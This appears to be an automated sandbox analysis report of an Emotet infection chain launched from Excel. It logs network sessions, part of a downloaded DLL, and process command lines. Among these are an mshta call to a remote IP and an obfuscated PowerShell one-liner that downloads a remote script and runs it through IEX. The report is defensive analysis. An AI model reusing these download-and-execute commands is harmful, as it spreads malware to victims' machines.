                                            content-length: 261
                                            server: Apache
                                            x-iplb-request-id: 66818F3D:C00F_D5BA2104:0050_61F4684A_0BFD:14170
                                            x-iplb-instance: 31947
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.2249168217.160.0.15580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 28, 2022 23:03:57.205395937 CET16OUTGET /wp-admin/G/ HTTP/1.1
                                            Host: michaelcrompton.co.uk
                                            Connection: Keep-Alive
                                            Jan 28, 2022 23:03:57.281140089 CET17INHTTP/1.1 200 OK
                                            Content-Type: application/x-msdownload
                                            Content-Length: 548864
                                            Connection: keep-alive
                                            Keep-Alive: timeout=15
                                            Date: Fri, 28 Jan 2022 22:03:57 GMT
                                            Server: Apache
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Expires: Fri, 28 Jan 2022 22:03:57 GMT
                                            Content-Disposition: attachment; filename="aiK6pubP5D.dll"
                                            Content-Transfer-Encoding: binary
                                            Set-Cookie: 61f4684d41661=1643407437; expires=Fri, 28-Jan-2022 22:04:57 GMT; Max-Age=60; path=/
                                            Last-Modified: Fri, 28 Jan 2022 22:03:57 GMT
                                            X-Frame-Options: SAMEORIGIN
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.2249169160.16.102.16880C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData


                                            Click to jump to process

                                            Target ID:0
                                            Start time:23:03:18
                                            Start date:28/01/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                            Imagebase:0x13f180000
                                            File size:28253536 bytes
                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:2
                                            Start time:23:03:21
                                            Start date:28/01/2022
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                                            Imagebase:0x49ec0000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:4
                                            Start time:23:03:22
                                            Start date:28/01/2022
                                            Path:C:\Windows\System32\mshta.exe
                                            Wow64 process (32bit):false
                                            Commandline:mshta http://91.240.118.172/cc/vv/fe.html
                                            Imagebase:0x13fdf0000
                                            File size:13824 bytes
                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:5
                                            Start time:23:03:23
                                            Start date:28/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                            Imagebase:0xff860000
                                            File size:27136 bytes
                                            MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Target ID:7
                                            Start time:23:03:24
                                            Start date:28/01/2022
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                            Imagebase:0x13f8d0000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            Target ID:9
                                            Start time:23:03:35
                                            Start date:28/01/2022
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                            Imagebase:0x4ab00000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:10
                                            Start time:23:03:36
                                            Start date:28/01/2022
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                            Imagebase:0xa40000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                            Reputation:high

                                            Target ID:11
                                            Start time:23:03:39
                                            Start date:28/01/2022
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                            Imagebase:0xa40000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high

                                            Target ID:12
                                            Start time:23:03:56
                                            Start date:28/01/2022
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
                                            Imagebase:0xa40000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high

                                            Target ID:13
                                            Start time:23:04:07
                                            Start date:28/01/2022
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
                                            Imagebase:0xa40000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high

                                            No disassembly